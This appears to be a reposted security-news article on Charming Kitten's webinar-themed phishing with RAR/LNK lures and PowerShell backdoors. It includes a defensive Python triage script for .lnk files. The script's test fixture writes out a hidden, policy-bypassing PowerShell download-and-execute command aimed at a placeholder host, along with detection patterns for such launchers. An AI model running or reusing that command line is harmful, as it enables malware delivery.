
Iranian Hackers Target Middle East Policy Experts

A new set of cyberattacks has been attributed to the Iranian-origin threat actor Charming Kitten, also known as APT35, CharmingCypress, Mint Sandstorm, TA453, and Yellow Garuda. The group has a history of social engineering campaigns against a wide range of entities, including think tanks, NGOs, and journalists in the Middle East. The attacks are designed to harvest sensitive information using malware such as MischiefTut and MediaPl (aka EYEGLASS), which can compromise a host and gather data. The group has also used backdoors such as PowerLess, BellaCiao, POWERSTAR (aka GorjolEcho), and NokNok to sustain its operations. The attacks observed between September and October 2023 involved Charming Kitten posing as the Rasanah International Institute for Iranian Studies (IIIS) to initiate contact and build trust with targets.

The attacks are characterized by the use of compromised email accounts belonging to legitimate contacts alongside multiple threat-actor-controlled email accounts. The attackers use Multi-Persona Impersonation (MPI), in which several actor-controlled personas take part in the same email thread, to make the exchange look more convincing and legitimate. The emails include RAR archives containing LNK files that serve as the starting point for distributing malware. The messages urge prospective targets to join a fake webinar on topics of interest to them. One multi-stage infection sequence has been observed to deploy BASICSTAR and KORKULOADER, a PowerShell downloader script.

BASICSTAR is Visual Basic Script (VBS) malware capable of gathering basic system information, remotely executing commands relayed from a command-and-control (C2) server, and downloading and displaying a decoy PDF file. The phishing attacks are also engineered to serve different backdoors depending on the victim's operating system: Windows victims are compromised with POWERLESS, while Apple macOS victims are led through an infection chain that culminates in NokNok, delivered via a functional VPN application laced with malware.
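The RAR-archive-with-LNK delivery described above is the one step of this chain a defender can triage mechanically before any PowerShell runs: a shortcut's target path and command-line arguments are stored in plain sight in the .lnk file, so a mail gateway or sandbox can open the archive, parse each shortcut, and flag launchers that invoke a hidden-window, policy-bypassing PowerShell downloader. The script below is an added example for this page, not code from Volexity, The Hacker News or the threat actor's tooling. It parses the shell-link StringData fields per the MS-SHLLINK layout and scores the reconstructed launch command. Everything it inspects is constructed in the script itself: `build_lnk()` assembles the shortcut bytes, the webinar-themed member names, the command line and the `webinar.example` URL are assumptions chosen to look like a typical launcher, not published indicators, and reading the actual RAR container is left to a tool such as `unrar` or the `rarfile` module (the function takes already-extracted members).

```python
"""Triage for the RAR -> LNK -> PowerShell-downloader chain described above.
Added example for this page, not code from Volexity, The Hacker News or the actor's tooling.
The shortcuts are constructed here with build_lnk() so the parser runs offline; they are not
real samples, and the command line and URL are assumptions, not published indicators."""
import re
import struct

# LinkFlags bits from MS-SHLLINK section 2.1.1, low bit first
(HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_RELATIVE_PATH,
 HAS_WORKING_DIR, HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE) = (1 << i for i in range(8))
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"), (HAS_WORKING_DIR, "working_dir"),
                 (HAS_ARGUMENTS, "arguments"), (HAS_ICON_LOCATION, "icon_location"))  # StringData order
HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}

# What turns a shortcut into a launcher worth escalating; two or more hits -> suspicious.
SUSPICIOUS_PATTERNS = {
    "powershell_host": re.compile(r"powershell(?:\.exe)?|\bpwsh\b", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "policy_bypass": re.compile(r"-e(?:p|xecutionpolicy)\s+bypass", re.I),
    "encoded_command": re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "download_primitive": re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\biex\b", re.I),
    "remote_url": re.compile(r"https?://", re.I),
}

def build_lnk(relative_path, arguments="", id_list=b""):
    """Build a minimal Unicode .lnk: header, optional LinkTargetIDList, StringData (test data only)."""
    flags, body = IS_UNICODE, b""
    if id_list:
        flags |= HAS_LINK_TARGET_ID_LIST
        body += struct.pack("<H", len(id_list)) + id_list
    for value, flag in ((relative_path, HAS_RELATIVE_PATH), (arguments, HAS_ARGUMENTS)):
        if value:
            flags |= flag
            body += struct.pack("<H", len(value)) + value.encode("utf-16-le")  # CountCharacters + UTF-16LE
    # HeaderSize, CLSID, LinkFlags, FileAttributes, 3 FILETIMEs, FileSize, IconIndex, ShowCommand, HotKey, 3 reserved
    return struct.pack("<I16sIIQQQIIIHHII", HEADER_SIZE, LNK_CLSID, flags, 0x20, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0) + body

def parse_lnk(data):
    """Return the StringData fields of a shell link, skipping IDList and LinkInfo by their size fields."""
    if len(data) < HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != HEADER_SIZE:
        raise ValueError("bad HeaderSize")
    if data[4:20] != LNK_CLSID:
        raise ValueError("bad LinkCLSID")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    pos = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:  # IDListSize (2 bytes) does not count itself
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:  # LinkInfoSize (4 bytes) does count itself
        pos += struct.unpack_from("<I", data, pos)[0]
    unicode, fields = bool(flags & IS_UNICODE), {}
    for flag, name in STRING_FIELDS:
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, pos)[0]  # characters, not bytes
        nbytes = count * 2 if unicode else count
        raw = data[pos + 2:pos + 2 + nbytes]
        if len(raw) != nbytes:
            raise ValueError(f"truncated {name}")
        fields[name] = raw.decode("utf-16-le" if unicode else "cp1252", errors="replace")
        pos += 2 + nbytes
    return fields

def triage_lnk(data):
    """Score one shortcut's launch command (target path plus arguments) against SUSPICIOUS_PATTERNS."""
    fields = parse_lnk(data)
    command = (fields.get("relative_path", "") + " " + fields.get("arguments", "")).strip()
    return {"command": command, "hits": [n for n, p in SUSPICIOUS_PATTERNS.items() if p.search(command)]}

def triage_archive(members):
    """members: archive member name -> bytes, as already extracted by unrar/rarfile (not shown here)."""
    findings = []
    for name, blob in members.items():
        if not name.lower().endswith(".lnk"):
            continue
        try:
            result = triage_lnk(blob)
        except ValueError as exc:  # a shortcut the parser rejects still deserves a human look
            findings.append({"member": name, "command": "", "hits": [f"malformed: {exc}"], "verdict": "review"})
            continue
        if re.search(r"\.(?:pdf|docx?|xlsx?|pptx?)\.lnk$", name, re.I):
            result["hits"].append("document_double_extension")  # shortcut posing as a document
        result["member"] = name
        result["verdict"] = "suspicious" if len(result["hits"]) >= 2 else "benign"
        findings.append(result)
    return findings

# Constructed stand-in for an extracted, webinar-themed RAR attachment; not a real sample.
SAMPLE_MEMBERS = {
    "Webinar_Agenda.pdf.lnk": build_lnk(
        "..\\..\\..\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "-w hidden -ep bypass -c \"iex (New-Object Net.WebClient).DownloadString('https://webinar.example/stage2')\""),
    "Speaker_Bio.lnk": build_lnk("..\\Documents\\Speaker_Bio.docx"),
    "Agenda.pdf": b"%PDF-1.4 constructed placeholder",
}

if __name__ == "__main__":
    for f in triage_archive(SAMPLE_MEMBERS):
        print(f"{f['verdict']:10} {f['member']}: {', '.join(f['hits']) or '-'}")
```

The two-hit threshold is deliberate: a lone `powershell.exe` target is common in legitimate shortcuts, but a PowerShell target combined with a hidden window, an execution-policy bypass, a download primitive or a remote URL is the shape of a first-stage loader, and a shortcut named like a document is worth escalating on its own. The parser walks the structure in spec order (header, IDList, LinkInfo, then the StringData fields) rather than string-scanning the file, so an actor cannot hide the command line from it by padding the optional sections.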

Volexity researchers Ankur Saini, Callum Roxan, Charlie Gardner, and Damien Cash note that CharmingCypress employs unusual social-engineering tactics, such as engaging targets in prolonged conversations over email before sending links to malicious content. They also observe that few other threat actors have consistently churned out as many campaigns as CharmingCypress, dedicating human operators to support their ongoing efforts.

This disclosure comes as Recorded Future uncovered the IRGC's targeting of Western countries through a network of contracting companies that also export surveillance and offensive technologies to countries such as Iraq, Syria, and Lebanon. The relationship between Iran's intelligence and military organizations and these contractors takes the form of various cyber centers that act as "firewalls" to conceal the sponsoring entity. One such contractor is Ayandeh Sazan Sepher Aria, which is suspected of being associated with Emennet Pasargad.

Want to read more? Check out the original article available at The Hacker News!


Deitasoft © 2024. All Rights Reserved.